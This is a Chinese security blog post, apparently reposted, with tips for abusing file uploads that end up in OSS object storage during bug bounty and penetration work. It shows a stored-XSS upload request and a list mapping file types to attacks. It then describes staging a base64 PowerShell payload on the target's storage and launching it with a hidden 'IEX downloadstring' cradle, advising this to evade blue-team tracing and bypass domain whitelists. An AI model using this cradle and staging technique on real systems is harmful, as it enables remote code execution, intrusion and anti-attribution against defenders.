OSS任意文件上传的小技巧|挖洞技巧

admin 2024年5月21日22:30:56评论50 views字数 1740阅读5分48秒阅读模式

0x01 前言

在日常挖SRC还有渗透时,很多时候我们可能会遇到一个情况,发现一个上传点可以上传文件但是不能解析!文件传到OSS去了这里可能有的师傅就已经开始离开这伤心站点了

OSS任意文件上传的小技巧|挖洞技巧

虽然文件上传到OSS危害不大,但是我们组合其他漏洞打出一点小伤害还是能拿到SRC的一点泡面钱的,下面分享我常用的两个小tips供各位参考。

末尾可领取资源文件

0x02 OSS打XSS

漏洞场景:发现站点存在文件上传,但文件传到了OSS,并且无法解析动态脚本,为了能挣点泡面钱,可以尝试上传html来凑个存储XSS。

------WebKitFormBoundary0orTsGAmHsHaAUgyContent-Disposition: form-data; name="file"; filename="favicon.html"Content-Type: text/html<script>alert(1)</script>------WebKitFormBoundary0orTsGAmHsHaAUgy--

OSS任意文件上传的小技巧|挖洞技巧

有些网站限制了只能图片上传,这时可以试试传svg格式的图片

OSS任意文件上传的小技巧|挖洞技巧

这里虽然是下载了传上去的文件但无法触发XSS,但是这里还可以用其他洞再打一波组合拳,但是漏洞利用条件也高了,所以有些SRC也就不收了

OSS任意文件上传的小技巧|挖洞技巧

这里根据上传文件的后缀可以拓展其他攻击的方式,附上文件上传漏洞利用方式 Top10,感兴趣的师傅可以去研究研究

1. ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE2. SVG: 存储 XSS / SSRF / XXE3. GIF: 存储 XSS / SSRF4. CSV: CSV 注⼊5. XML: XXE6. AVI: LFI / SSRF7. HTML / JS : HTML 注⼊ / XSS / 开放重定向8. PNG / JPEG: 像素洪⽔攻击 (DoS)9. ZIP: RCE via LFI / DoS10. PDF / PPTX: SSRF / 盲打 XXE

0x03 OSS文件跳板

漏洞场景:发现站点存在文件上传,但文件传到了OSS,并且无法解析动态脚本。

这个和上面打XSS差不多一个意思,这里传我们的powershell脚本或者其他脚本到目标的OSS上,因为OSS只存储静态的文件那么我们就可以把上线的脚本传上去让其他主机来访问。

这里作为一个跳板也能防止蓝队溯源到你的真实服务器,让蓝队溯到其他人身上,但这也会把上线的脚本一直留在OSS上,所以后面还得做其他方面的防溯源的手段,所以还是有利有弊吧。

------WebKitFormBoundary0orTsGAmHsHaAUgyContent-Disposition: form-data; name="file"; filename="favicon.html"Content-Type: text/html$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAA/+y9Wa/qSrIu+rzrV8yHLa21xNo1wIAxR9rSNTYY444eTJ1SyRjjBtw3YM49//1GZBoGY865VtXW1rkPV3dKUwyMnU1kxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx------WebKitFormBoundary0orTsGAmHsHaAUgy--

OSS任意文件上传的小技巧|挖洞技巧

命令执行上线主机

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://pikachu.test/vul/unsafeupload/uploads/favicon.html'))"

OSS任意文件上传的小技巧|挖洞技巧

OSS任意文件上传的小技巧|挖洞技巧

补充一点,在某些时候目标设置了某个高可信域名为白名单域名,只要是这个白名单域名的那么都是可信然后放行,如果是不可信的直接拦下审计,这时如果我们传了脚本上去就可以绕开目标的一些白名单策略。

0x05 总结

        之前遇到这种情况,我也是上传html文件,说危害就说比如有xss、非法言语等,但是最近有了新的思路。喜欢的师傅可以点赞转发支持一下谢谢!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月21日22:30:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSS任意文件上传的小技巧|挖洞技巧https://cn-sec.com/archives/2756847.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息